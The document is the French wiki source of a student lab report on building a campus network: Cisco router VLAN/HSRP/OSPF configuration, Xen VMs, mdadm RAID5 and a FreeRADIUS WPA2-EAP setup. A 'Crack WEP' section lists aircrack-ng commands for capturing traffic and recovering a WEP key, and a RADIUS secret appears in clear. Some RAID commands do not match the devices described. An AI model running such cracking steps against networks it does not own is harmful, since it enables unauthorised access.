  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en terminant en '''C0''' plutôt '''B0'''&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
